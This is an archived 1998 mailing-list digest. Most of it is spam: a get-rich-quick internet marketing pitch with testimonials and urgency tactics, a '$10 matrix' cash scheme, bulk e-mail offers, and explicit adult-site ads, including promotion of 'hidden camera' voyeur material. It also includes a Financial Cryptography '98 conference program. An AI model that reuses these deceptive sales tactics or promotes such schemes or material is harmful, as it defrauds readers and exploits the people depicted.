Message-ID: <199801200343.TAA26102@mail.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




"I finally found the secrets I've been looking for.  Your manual  
tells all and has given me the tools I need to succeed, finally a 
genuine Internet insider tells all!  If you're doing business on the 
web or have ever wanted to, this is a must have.  You're the best,
I'm making your manual into my Internet Bible! Thanks a million!"

Best Regards,
(satisfied customer) Florida

WOW!, What a value your program is! Just the secrets on
email was worth the price alone, not to mention all the other
valuable things you included. I have already put up some ads
and I eagerly anticipate positive results.

Tom Hatcher - Minnesota


----------------------------------------------------------------------------------------

Hello Internet friend,

What I am going to share with you may well be, for many of you, 
THE opportunity to start a unique, very successful business or take an 
EXISTING one to new untouched heights, by taking advantage of some 
breakthrough trends that are making "marketing history!"  You will soon
discover the art of . . . 

"How to Really Make Money on the Information Superhighway!"

Some of you may already have purchased some "electronic
marketing course" or tried to market some product online.
Maybe you even made a sizeable profit! Whatever the case may
be; No matter how successful you are right now, you can
profit tremendously from what we are about to tell you!

FACT:  ANYONE WHO HAS THE DRIVE TO SUCCEED CAN ACTUALLY MAKE A SIZABLE PROFIT ON THE INTERNET.

FACT:  NOT MANY PEOPLE ARE WILLING TO TAKE THE TIME TO ACTUALLY DO IT.

Why would people want to pass up this extremely valuable money making opportunity?

Because learning is the key to succeeding online.  Marketing on the Internet 
requires a wealth of  knowledge.  To learn everything you need to know 
about Marketing on the Internet takes more time than any human being 
can spare.  The small amount of Internet marketers actually making a 
sizable profit know this all too well. 

Now think about this...

WHAT IF? I could provide YOU with an incredible Marketing Package 
that encompasses all the "How To" information you need to be a success 
on the Internet.  This phenomenal package includes DETAILED Internet 
SECRETS (we don't hold anything back, its all here folks!!), which explains 
in detail how to Profit from the Internet Explosion.  Whether you have a 
business of your own or you want to start one.  It's filled with over 45 packed 
pages revealing the secrets about electronic marketing so many other online 
marketers DON'T want you to know.

I thought that might interest YOU.

Let me explain.

<><><><><><><><><><><><><><><><><><><><><><><><>
 
Right now there are over sixty million people surfing the Internet.  By
the year 2000, that figure is expected to more than double. With so many 
people using the Internet, smart "net"repreneur's are taking advantage 
of what this new (in terms of true commercial application) and exciting 
medium has to offer.

The Internet presents one of the best ways to make money that has 
ever been introduced. On any given day you have the opportunity to 
reach more people than most cities have population wise. This is the 
reason so many businesses are scrambling to make their presence
known on the Internet. 

Being "online" offers a person the ability to reach multitudes of people 
from all over the world.  It also offers, to those who know how, THE 
ABILITY TO MAKE EXCELLENT MONEY. And we do mean 
excellent money!!!

CONSIDER THIS POSSIBILITY: You wake up in the morning and 
you put on a pot of coffee. As you sip on your cup of hot "brew" you 
saunter over and turn your computer on. Then, as your monitor glows 
from dim to bright, you find that you have inquiries from all sorts of 
people requesting what you have to offer. Later, after you have 
finished reading your inquiries, you stroll out to your mailbox. You 
find it is filled with letters from people from all across the world! 
What's even better though, is that the letters are FILLED WITH 
MONEY; cash, checks, and money orders. Then, after tallying 
up the totals, you find that you have made anywhere between  
$200 to $1,000 and it isn't even one o'clock in the afternoon. 
 
Think of it: NO boss, NO traffic, and NO annoying Co-workers. 
Wouldn't it feel great to wake up in the morning knowing you 
are going to be making excellent money but don't have to leave 
your house to do it!?!  Wouldn't your life be far less complicated?

The truth is, you can be one of those who become financially
independent via the Internet. AND THE BEST PART IS...IT 
DOESN'T REQUIRE A LOT OF MONEY!!

What it does require is the knowledge of how, what, and where 
to do it. That is where we can help. We provide you with 
the knowledge of how to begin earning substantial income from 
your computer via the "information superhighway".   

We can remember how overwhelming the Internet seemed when we
were first introduced to it.  We realized the marketing and profit 
potential the Internet holds, but really had no idea how to pursue it. 
In our thirst for answers and knowledge, we purchased everything 
we could find that had information on the How, What, and Where. 
We spent thousands of dollars, but we now know what works and
what doesn't.  No where, in all of our searching, could we find a 
complete packet of information for all of our questions.  That is why 
we decided to write this report.  We have compiled every proven 
method and secrets that we have learned along the way into one 
complete, easy to understand report.

This PROVEN REPORT makes believers of skeptics!  

Sound too good to be true?  That's what others have said.  That is, 
until they received their reports and saw for themselves just how easy
it is to make money on the net!


Hi NI,

I received your report and free bonuses last Saturday and wanted to
congratulate you on a job well done. I read through your report "How 
To Profit From The Internet" and I'm very impressed.  I have bought 
other books and manuals about  Online Marketing, Direct Marketing, 
E-mail, Mail Order, etc. Yours is the only one that explains the
subject  in an easy to understand language.  I finally found the 
secrets I've been looking for. 

Once again, Great Job!

Sincerely,
John Strand - Satisfied Customer



My father has always told me, "remember, Michele, there is no free 
lunch in life. You get out of life what you put into it."  Through trial 
and error and a somewhat slow frustrating start, I purchased your 
report and finally figured out how to start a very profitable business
from my home. Your report is great, you give the average person 
the tools and secrets to succeed.  I know my dad is very proud of 
me now.

I can't thank you enough =)

Michele B from Oregon


Good Morning,

I hope this finds you well.  I received your program yesterday after-
noon and read it cover to cover.  You have put together a very 
valuable resource indeed.  I have finally found the program that 
tells all!  Your program has given me the tools I need to succeed.  
Your program could truly end up being the best $39.95 I ever spent!

Your the best, I'm making your manual into my internet Bible!!  
Thanks a million!

Best Regards,
Mary Wecker


This is a wonderful opportunity, we urge you to take advantage of it. 
You won't find too many people that will give away ALL of their
secrets!!  The majority of the rich people today have copied what  
someone else is or has been doing.  That is what we are offering 
you now--a chance to copy our success!!  It is very easy and we 
ARE for REAL!

Here's a little more incentive to check this out...

~IF YOU ORDER WITHIN 3 DAYS~

We will send you:

 **** FREE $400 Bulk e-mail Software ****
 **** FREE $200 Check by phone, fax, E-mail Software ****
 **** FREE $10 Calling Card ****
 
----PLUS----

We will send you a list of over 100 major search engines ready to
surf on the Internet or to place a free link to your web page.   Also, 
you will receive a list of  98 of the best inexpensive newspapers to 
advertise in (U.S. orders only).  The list is complete with papers name, 
city, phone number, circulation and frequency  (Daily or Weekly).  

We will also include five free BONUS reports that include these topics:
 How to Protect your PC from Viruses
 How to get 300+ Quality Prospect to E-mail you Weekly
 Tips and Secrets to Advertising with the major Online Services
 What's wrong with the World Wide Web 
 Tax Advantages for the Home Business Owner.  
You will find that these five reports by themselves are worth 
thousands of dollars to you. These bonuses alone are worth several 
times the cost of the report.

We will also give you a secret list of over 1500 of the best Web sites 
where you can place a FREE advertisement.  This is a list we use 
every day to run our business and we are giving it to you!  Imagine 
what a great offering we are giving you for FREE! 

And we're not through, if you order RIGHT NOW,  we will give you 
15 FREE "How to Reports" that you are free to market and sell on the 
Internet or through mail order for $15-30 each.  They are 45-60 
informational packed pages each.  A great way to start your own 
Net based business!  The topics are;

            1)   Earn Extra Dollars with a Home Based Answering Machine 
            2)   How to Buy a Car with Bad Credit 
            3)   How to Make Thousands of Dollars Winning Contests 
            4)   U.S. Government Auction Sales 
            5)   An Insider's Guide to Finding and Obtaining Grant Money 
            6)   Home Based Business for Fun and Profit 
            7)   How to Get a Job Fast 
            8)   How to Make Money Without Leaving Your House 
            9)   How to Turn the Hobby of Photography into Thousands 
           10)   Making Money at Garage Sales, Swap Meets, and Flea Markets 
           11)   How to Get Paid for Watching TV 
           12)   Getting Your Start in Theater, Television, and Movies 
           13)   Wills or Trusts?  The Case for Living Trusts 
           14)   How To Find Work with the Federal Government 
           15)   How to Write Almost Anything and Get Paid for it!

Are we nuts?

No, it just shows how confident we are that you'll be delighted with 
the information you'll have...just like the others who are already using 
the information and making money.  You will be surprised how quickly 
you can be earning money on the Internet!
 
So you are probably thinking to yourself, this is wonderful, but how much?  
$149.95,  $99.95 maybe even  $79.95?  You may have seen other companies 
marketing "How To" information on the Internet and charging these prices. 
People are actually buying these packages at these prices.  Why?  People 
want to know how to market a product or service the "Right" way on the 
Internet.  "How to Profit from the Internet" could easily sell for any of the 
above prices.  However, we feel that we would rather help those who 
may not have the ability to pay such a price in order to be successful.  
That is why we are offering "How to Profit from the Internet" for the 
unbelievable low price of $39.95.

That's right, that was not a typo...$39.95.  

Still skeptical???  Lets put that to rest right now.  We will make this 
completely risk free for you.  If you are not 100% satisfied with the
information you receive, and believe that you cannot use it to start a
successful business or increase your current business profits, return it
within 10 days and we will refund your money.  No questions asked!!  
(Because this information is very easy to copy, the guarantee is only 
available on Disk Orders).

I have sold this package at much higher prices in the recent past and will be
forced to raise my prices in the very near future. One of the things
you will learn in my manual is to constantly test your market.  I am
currently in the price testing phase of this marketing campaign.
On February 1st, 1998 I will be raising the price of this package
back up to $79.95 and eventually up to $129.95 to test the upscale market.
If you act quickly, you have the opportunity to get these materials today
for the unbelievable low price of $39.95.

So, if you are seriously interested in learning how to acquire wealth 
by being online, ACT NOW!!  This won't last for long!

Print out this form and mail it to the address below, with your $39.95 
cash, check, money order or credit card information.


Natural Instincts
4676 Commercial St. SE Suite 201 
Salem, Oregon 97302   

Thank you =) 

****Please print out the order form and mail it along with your payment****

**********************************************************
                                 ORDER FORM
**********************************************************

NAME______________________________________________________

ADDRESS___________________________________________________

CITY_______________________ STATE__________ ZIP__________

Deliver "How to Profit from the Internet" to the following email address:

E-MAIL ADDRESS____________________________________________
(please note, all orders must include an email address incase we encounter a 
problem with processing)

Area code and Phone number (Optional)

Day time __________________  Evening:  ________________________

[ ] If you prefer to have the report on disk, please check here.  Please 
include an additional $3.00 for shipping and handling, thank you.

Please check one of the following:

[ ]  I'm ordering within 3 days, please send my FREE software, $10.00 
calling card, 15 How to Reports and "How To Profit From The Internet" 
and FREE bonuses for the unbelievably low price of $39.95 today.

[ ]  I'm not ordering within the first 3 days of receiving this letter, so I 
agree to pay $39.95 for "How to Profit from the Internet" by itself, 
less the bonus package.

Payment Method:                             [Internal code 138109]

[ ] Check 

[ ] Cash

[ ] Money Order

[ ] Credit Card, please make sure to include the mailing address above!
          
             [  ] Visa       [  ]  MasterCard

Name of Credit Card: _____________________________

Name as it appears on Card: _________________________________

Card Number: __________________________________

Expiration Date: _____ / _____

Signature of Card Holder: _________________________.

***********************************************************
"In mail-order work, anyone with imagination, determination, and a
willingness to study and experiment may have very little difficulty
getting started. A number of the most successful one-man operations
obtain an income as high as $40,000 to $100,000 a year."

                - U.S. Department of Commerce
************************************************************                                                                          
THE MARKET IS HERE - TODAY!   TAKE ADVANTAGE OF IT!!!!!
After you receive your report, I'll answer any questions time permits 
via email.  I'm looking forward to helping you succeed!












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Tue, 20 Jan 1998 03:12:58 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Tue Jan 20 '98
Message-ID: <19980120082832.11724.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Tuesday's issue of Eureka!

DIGITAL EROTICA
Featuring thousands of quality, hand-picked images, stories,
streaming movies,  live strip shows, free video-conferencing
and a Usenet Decoding Service with Thumbnail Previews, for a
limited time they are offering FREE trial memberships. Cool!
DigitalErotica ........ http://www.digitalerotica.com/dream/

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
THE ULTIMATE HARDCORE SITES
http://sexplosion.com/adverts.shtml
An incredible collection of over 30 sites featuring the
hottest free hardcore photos. The pix are easy to find and
the sites are all very accessible. You won't be
disappointed.

RAGTOP'S LESBIANS
Click the link titled Ragtop's  lesbian archives, from there
you are onto some super hot  free  pix! It is a lesbian zone
unlike any other on the entire  world  wide web. You have to
cruise by this one! Dildos, pussy,  pussy and more pussy. Go
to this  website right now  you will  not be sorry one byte!
Ragtop's Lesbians .......... http://www.ragtop.com/Lez1.html

SWEET LIPS
Here we have  some  hot  looking  babes  licking each others
tits. Not a bad place to park  your browser for a while. The
image quality is very good.  The  women  are in all sorts of
sexy positions and licking a  lot  of  pussy.  Go and take a
look! ................ http://islanderotica.nf.ca/SweetLips/

INDEX OF LESBIANS
Interesting  website.  This  falls   under   the  no  frills
category. Just simple links  to  really  hot images! Blondes
with dildos, strap ons, surfer  girls.  Some images are gone
but the ones that are there are  good. You would be crazy to
not look. .... http://www.sacattlemen.com/adult/lesbian.html

CALIFORNIA GIRLS
One of the true golden  websites  out on the Internet. Check
this one out for sure.  There  is  only eight images but the 
really cool thing is that they  are thumnails of some of the 
hottest pussy action out there.  Girl on girl, pussy spreads
Some of these  pictures  are  almost  life  sized! Very high
quality images at full 1024 x 768 size!  Go there right now!
California .... http://sex.clubx.com/california/cbff100.html

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here ... http://www.netscape.com/download/
Hardcore ........................ http://204.244.215.7/anal/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat .................. http://137.39.63.229/chat/
General/Fun Chat ........ http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!....1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline.........1-800-644-8779
FREE: Live 1-on-1 (international call only)....011-678-77416

AMATEUR SITE OF THE DAY
MASHA & NATASHA: These 2 Russian  imports make me wonder why
we ever had a Cold  War,  because  these  chicks are HOT! So
pour yourself a glass of  vodka,  grab some caviar and enjoy
these lovely ladies.
............................ http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
VoyeurStories.com: Want  some  sizzling  free  voyeur erotic
stories accompianied by GENUINE  hidden camera pics? Satisfy
your peeping tom curiosity by visiting VoyeurStories.com....
.............................. http://www.voyeurstories.com/

DAILY CARTOON ........... http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! .... http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ........... http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ....... http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ....... http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ..... http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ..... http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE . http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 ........................... http://137.39.63.229/?200
Pic  2 ........................... http://137.39.63.229/?201
Pic  3 ........................... http://137.39.63.229/?202
Pic  4 ........................... http://137.39.63.229/?203
Pic  5 ........................... http://137.39.63.229/?204
Pic  6 ........................... http://137.39.63.229/?205
Pic  7 ........................... http://137.39.63.229/?206
Pic  8 ........................... http://137.39.63.229/?207
Pic  9 ........................... http://137.39.63.229/?208
Pic 10 ........................... http://137.39.63.229/?209

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marketing@shanesworld.com
Date: Tue, 20 Jan 1998 12:19:09 -0800 (PST)
To: marketing@shanesworld.com
Subject: Lets Chat
Message-ID: <199801202019.MAA17564@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


/////////////////////////////////////////////////////
This message is intended for adult webmasters only.
If you are not an adult webmaster and recieve this email,
I am very sorry for the inconvenience.  If you'd like your
name removed from my mailing list, please mail me
with the subject "REMOVE".
/////////////////////////////////////////////////////





Interested in Exchanging Links!!

I would like to take a sec of your time to introduce myself. But I do not want to force you to do anything you do not want to do. (Unless you are into that HA!! HA!! ) Anyway, you can check me out at my site and that will give you an idea of who I am.
http://shanesworld.com/
Now let's talk business. (Want to swap banners?)

I have http://shanesworld.com/ on the web that receive anywhere from 30,000
to 60,000 hits a day and growing. Please respond to this email and I
will place your link on my site. 

Just give me the name and URL of your Site and a brief description (how many free pix, thumbnails, and previews?) Also include a banner attachment in your mail. (Not Required)


You can find my banner and info at http://shanesworld.com/linkexch.html link my banner to http://shanesworld.com/. 

After we are done with all the BS let me know where you've placed my link.( REMEBER, I WILL GIVE YOU AS MUCH LOVE IN THE PLACEMENT OF YOUR BANNER AS YOU GIVE ME!!! )

I am also involved in many live feeds featuring friends and myself. If you are interested in any info at all, let me know. 
I look forward to hearing from you and working with you in the future.

Love, SHANE







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adults-Best@our.net
Date: Tue, 20 Jan 1998 13:25:05 -0800 (PST)
To: joseyl@usa.net
Subject: ADULT TRAFFIC TRADE - FREE GIFTS!!!
Message-ID: <3.0.5.32.19971209114127.00a0983b0@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


///////////////////////////////////////////////////////////////////////////////////////////
                This email has been filtered thru the remove list at REMOVELIST.COM
                If you wish to be removed from future mailings, please enter your email(s) at
                http://www.removelist.com
///////////////////////////////////////////////////////////////////////////////////////////

Adult Best is a Brand New Network of Adult Sites sharing the traffic that
they have already lost, via our exciting, new exit console.
 
 http://www.adultbest.com/info.html
 
 Each site runs a SMALL - TEXT ONLY - UNOBTRUSIVE -  EXIT CONSOLE making 
 it load extremely fast.  The exit console is opened ONLY when a surfer 
 is leaving a site! Your hard earned traffic stays within your site until 
 the surfer is leaving you.
 
 Yes, Traffic is Traffic, But .... This is targeted traffic and if we can 
 keep these serious Adult Site surfers within the community that we are 
 building, then that is where They will spend their money.  Stop letting 
 your hard earned traffic get away for nothing.

 Trade it in and get great content while you do !!! 

 We divide the webmasters of our network into teams of 8 web sites with
 similar traffic and offer each the entire team great content incentives for
 teams that send 500+ and 1000+ hits a day to the console from all sites
 combined.  That is only 62.5 and 125 exits a day from each site on the team
 !!!!
 
 HERE ARE THE CONTENT INCENTIVES:
 
 1.) 1000 Team Hits - Free Live Video ( 495.00 Value )
 
 2.) 500 Team Hits - 250 Unique Thumbnailed Images ( Updated Monthly )
 
 GET THE REST OF DETAILS & SIGN UP NOW:
 
 http://www.adultbest.com/info.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 65982672@hk.super.net
Date: Tue, 20 Jan 1998 14:57:13 -0800 (PST)
To: member1654@aol.com
Subject: Get More Orders For Anything You Sell
Message-ID: <4563463463573564652463423465>
MIME-Version: 1.0
Content-Type: text/plain


             EMAIL USA Mass E-Mail Discount Program
             ***************************************************

Advertise your Business or Website , with our Mass e-mail program. 
Fast * Affordable * Very Effective

EMail USA will send out your message to a vast amount of potential
customers in one day. Even if your website is in the top 10 you
can't get the traffic that you would as if you targeted everyone 
that sees your ad.
 
Why is our bulk e-mail program so effective?
Our bulk e-mail service provides businesses & individuals the
most inexpensive, and most effective way to reach millions 
of people over the internet. We currently have over 40 million 
addresses to offer, and counting.


*******Special Offers*******

Send your ad to 100,000 people for only $100
Send your ad to 225,000 people for only $200
Special discounts for larger runs.

Ask About Our -Targeted List- Advertising Program.

****Lowest prices guaranteed****
Special discounts for larger runs.

For more info on advertising with EMail USA 
please call (201)865-8919

*  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  *

If you received this message in error, please accept our apology.
Just type Remove, and reply to vx2001@hotmail.com
Your name will be permanantly removed from our database.

Thank You.

                  














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vi.Sion@19109.com
Date: Tue, 20 Jan 1998 18:59:02 -0800 (PST)
To: Marketer@19109.com
Subject: BRAND NEW $10 MATRIX
Message-ID: <199702170025.GAA08056@wrinkletop.com>
MIME-Version: 1.0
Content-Type: text/plain



$$$$$$  PRE-LAUNCH $10 ULTIMATE MATRIX SYSTEM  $$$$$$
         ABSOLUTELY "BRAND NEW" JAN 1ST 1998

#$#$  JUST $10 ONE-TIME GETS YOU IN

#$#$  NO SPONSORING EVER

#$#$  NO DISKS, NO CODES, JUST CASH

http://www.replinets.com/users/ce462043/ums.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Hirschfeld <R.Hirschfeld@cwi.nl>
Date: Tue, 20 Jan 1998 19:26:57 -0800 (PST)
To: R.Hirschfeld@cwi.nl
Subject: Financial Cryptography '98 Preliminary Program
Message-ID: <UTC199801210325.EAA24492.ray@vanity.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


                      Financial Cryptography '98
                   Second International Conference
                 February 23-25, 1998, Anguilla, BWI
                          CONFERENCE PROGRAM


General Information:

Financial Cryptography '98 (FC98) is a conference on the security of
digital financial transactions.  Meetings alternate between the island
of Anguilla in the British West Indies and other locations.  This
second meeting will be held in Anguilla on February 23-25, 1998.  FC98
aims to bring together persons involved in both the financial and data
security fields to foster cooperation and exchange of ideas.

Original papers were solicited on all aspects of financial data
security and digital commerce in general.


Program Committee:

Matt Blaze, AT&T Laboratories--Research, Florham Park, NJ, USA
Antoon Bosselaers, Katholieke Universiteit Leuven, Leuven, Belgium
Yves Carlier, Bank for International Settlements, Basel, Switzerland
Walter Effross, Washington College of Law, American U., Washington DC, USA
Matthew Franklin (Co-Chair), AT&T Laboratories--Research, Florham Park, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld (Chair), Unipay Technologies, Amsterdam, The Netherlands
Alain Mayer, Bell Laboratories/Lucent Technologies, Murray Hill, NJ, USA
Moni Naor, Weizmann Institute of Science, Rehovot, Israel
Frank Trotter, Mark Twain Ecash/Mercantile Bank, St. Louis, MO, USA
Doug Tygar, Carnegie Mellon University, Pittsburgh, PA, USA
Moti Yung, CertCo LLC (formerly: Bankers Trust E-Commerce), New York, NY, USA


Conference Program for FC98:

Monday 23 February 1998

 800 --  820
    Breakfast

 820 --  830
    Welcome

 830 --  905
    Micropayments via Efficient Coin-Flipping
    Richard J. Lipton (Princeton University, Princeton, NJ, USA)
    Rafail Ostrovsky (Bellcore, Morristown, NJ, USA)

 905 --  940
    X-Cash: Executable Digital Cash
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Ari Juels (RSA Laboratories, Bedford, MA, USA)
 
 940 -- 1015
    Billing Without Paper...Or Billing Without Billers?
      Caveat Biller: 3rd Party Concentrators Could Come Between You
      and Your Customers
    Richard K. Crone (CyberCash, Reston, VA, USA)
 
1015 -- 1045
    Coffee Break

1045 -- 1120
    A Platform for Privately Defined Currencies, Loyalty Credits,
      and Play Money
    David P. Maher (AT&T Labs--Research, Florham Park, NJ, USA)

1120 -- 1155
    Assessment of Threats for Smart Card Based Electronic Cash
    Kazuo J. Ezawa, Gregory Napiorkowski
        (Mondex International, Florham Park, NJ, USA)

1155 -- 1230
    Using a High-Performance, Programmable Secure Coprocessor
    Sean W. Smith, Elaine R. Palmer, Steve Weingart
        (IBM T.J. Watson Research Center, Yorktown Heights, NY, USA)
 
1230 -- 1330
    Lunch

1800 -- 1930
    Cocktail Reception (at Mariners Hotel)


Tuesday 24 February 1998

 800 --  830
    Breakfast

 830 --  905
    Secure Group Barter:
      Multi-Party Fair Exchange with Semi-Trusted Neutral Parties
    Matt Franklin (AT&T Labs--Research, Florham Park, NJ, USA)
    Gene Tsudik (USC Information Sciences Institute, Marina del Rey, CA, USA)

 905 --  940
    A Payment Scheme Using Vouchers
    Ernest Foo, Colin Boyd
        (Queensland University of Technology, Brisbane, Australia)
 
 940 -- 1015
    A Formal Specification of Requirements for Payment Transactions
      in the SET Protocol
    Catherine Meadows, Paul Syverson
        (Naval Research Laboratory, Washington, DC, USA)
 
1015 -- 1045
    Coffee Break

1045 -- 1120
    On Assurance Structures for WWW Commerce
    Markus Jakobsson (Bell Laboratories, Murray Hill, NJ, USA)
    Moti Yung (CertCo, New York, NY, USA)

1120 -- 1230
    Panel Discussion
    Certificate Revocation: Mechanics and Meaning
    Barb Fox (Microsoft, Redmond, WA, USA), moderator
    Joan Feigenbaum (AT&T Labs--Research, Florham Park, NJ, USA)
    Paul Kocher (Valicert, Palo Alto, CA, USA)
    Michael Myers (Verisign, Mountain View, CA, USA)
    Ron Rivest (MIT Laboratory for Computer Science, Cambridge, MA, USA)  
 
1230 -- 1330
    Lunch

2000 -- 2200
    Rump Session


Wednesday 25 February 1998

 800 --  830
    Breakfast

 830 --  930
    Invited Speaker
    Private Signatures and E-commerce
    David Chaum (DigiCash, Palo Alto, CA, USA)

 930 -- 1005
    Group Blind Digital Signatures:
      A Scalable Solution to Electronic Cash
    Anna Lysyanskaya, Zulfikar Ramzan
        (MIT Laboratory for Computer Science, Cambridge, MA, USA)

1005 -- 1045
    Coffee Break

1045 -- 1120
    Curbing Junk E-Mail via Secure Classification
    Eran Gabber, Markus Jakobsson, Yossi Matias, Alain Mayer
        (Bell Laboratories, Murray Hill, NJ, USA)

1120 -- 1155
    Publicly Verifiable Lotteries:
      Applications of Delaying Functions
    David M. Goldschlag (Divx, Herndon, VA, USA)
    Stuart G. Stubblebine (AT&T Labs--Research, Florham Park, NJ, USA)

1155 -- 1230
    Security of Digital Watermarks
    Lesley R. Matheson, Stephen G. Mitchell, Talal G. Shamoon,
      Robert E. Tarjan, Francis X. Zane
        (STAR Lab, InterTrust Technologies, Sunnyvale, CA, USA)

1230 -- 1330
    Lunch

1330 -- 1405
    Security in the Java Electronic Commerce Framework
    Surya Koneru, Ted Goldstein
        (JavaSoft, Palo Alto, CA, USA)

1405 -- 1440
    Beyond Identity: Warranty-Based Digital Signature Transactions
    Yair Frankel, David W. Kravitz, Charles T. Montgomery, Moti Yung
        (CertCo, New York, NY, USA)

1440 -- 1515
    Compliance Checking in the PolicyMaker Trust Management System
    Matt Blaze, Joan Feigenbaum, Martin Strauss
        (AT&T Labs--Research, Florham Park, NJ, USA)

1515 -- 1545
    Coffee Break

1545 -- 1620
    An Efficient Fair Off-Line Electronic Cash System
      with Extensions to Checks and Wallets with Observers
    Aymeric de Solages, Jacque Traore
        (France Telecom--CNET, Caen, France)

1620 -- 1655
    An Efficient Untraceable Electronic Money System Based on
      Partially Blind Signatures of the Discrete Logarithm Problem
    Shingo Mayazaki, Kouichi Sakurai
        (Kyushu University, Fukuoka, Japan)

1655 -- 1700
    Closing


The conference schedule and additional information is available at the
URL http://www.cwi.nl/conferences/FC98/.

Breakfast and lunch are provided at the conference.  The conference
organizers have left time open for corporate sponsored events, for
networking, and for recreational activities on the resort island of
Anguilla.  Participants are encouraged to bring their families.


Workshop:

A 40-hour workshop, intended for anyone with commercial software
development experience who wants hands-on familiarity with the issues
and technology of financial cryptography, is planned in conjunction
with FC98, to be held during the week following the conference.

For more information on the workshop, please see the URL
http://www.cs.berkeley.edu/~iang/fc98/workshop.html.

For workshop registration, see the URL http://fc98.ai/.


Special Attraction:

On Thursday, February 26, 1998, there will be a total eclipse of the
sun.  The narrow zone of 100% totality will pass just south of
Anguilla.  A boat excursion to the center of the eclipse zone is
planned, for an optimal view of the eclipse.  The excursion is
included in the conference registration; additional tickets can be
purchased for accompanying persons.


Venue:

The Inter-Island Hotel is a small 14-room guest house with a large,
comfortable 150-seat conference facility and additional space for a
small 10-booth exhibition.  The Inter-Island is on Road Bay, near
Sandy Ground Village, in the South Hill section of Anguilla.  The
conference, workshop, and exhibition will have TCP/IP internet access.
Shuttle service to the conference will be available.


Air Transportation and Hotels:

Air travel to Anguilla is typically done through San Juan for US
flights, or St. Maarten/Martin for flights from Europe and the US.
There are also connections via Antigua.

Anguillan import duties are not imposed on hardware or software which
will leave the island again. There are no other taxes--or cryptography
import/export restrictions--on Anguilla.

Hotels range from spartan to luxurious, and more information about
hotels on Anguilla can be obtained from your travel agent, or at the
URL http://fc98.ai/.  A block reservation has been made at Mariners,
and this is the recommended hotel except for those seeking budget
accomodations.


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah@shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince@offshore.com.ai

Exhibits and Sponsorship Manager:

Blanc Weber, Seattle, WA, USA
   email: blancw@cnw.com

Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
  email: iang@cs.berkeley.edu


Registration:

You can register and pay for conference admission via the World Wide
Web at the URL http://fc98.ai/.

The cost of the FC98 Conference is US$1,000.  There are reduced rates
of US$250 and US$100 for full-time academics and students.

Booths for the exhibition start at US$5,000 and include two conference
tickets. For more information about exhibit space, contact Blanc
Weber, blancw@cnw.com.  Sponsorship opportunities for FC98 are still
available.

The cost of the workshop is US$5000, and includes meals but not
lodging.  You can register for the workshop, which runs the week after
the conference, at the URL http://fc98.ai/.


Financial Cryptography '98 is held in cooperation with the
International Association for Cryptologic Research.

It is sponsored by:

RSA Data Security Inc. <http://www.rsa.com>
C2NET, Inc. <http://www.c2.net>
Hansa Bank & Trust Company Limited, Anguilla <http://www.hansa.net/>
Sicherheit und Privat- International Bank <mailto:spbank@schloss.li>
Offshore Information Services <http://www.offshore.com.ai/>
e$ <http://www.shipwright.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: B_Crawford49@earthlink.net
Date: Tue, 20 Jan 1998 22:44:05 -0800 (PST)
To: yourbox@mail.com
Subject: Additional Source of Income
Message-ID: <0000000000.AAA000@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><FONT SIZE=1><B>
*************************************************************
Our Research Has Indicated That The Following
Message Will Be Of Interest To You.
*************************************************************
<FONT SIZE=4><FONT COLOR="#ff0000"><I>
<P ALIGN=CENTER>
<U><I>THE HOME WORKERS SURVIVAL GUIDE</U></I>

 <FONT COLOR="#000000"><FONT SIZE=3><I>  
    If you plan on finding legitimate work at home, you need this book!
Years of experience and thousands of hours of research have gone into 
"The Home Workers Survival Guide". There is no better source of 
information on at-home income opportunities. Use our listings to 
contact the right companies and you can start to receive weekly checks
up to $1000! Please read on so you can get started right away!
<P ALIGN=LEFT><FONT COLOR="#0000ff"><FONT SIZE=3>
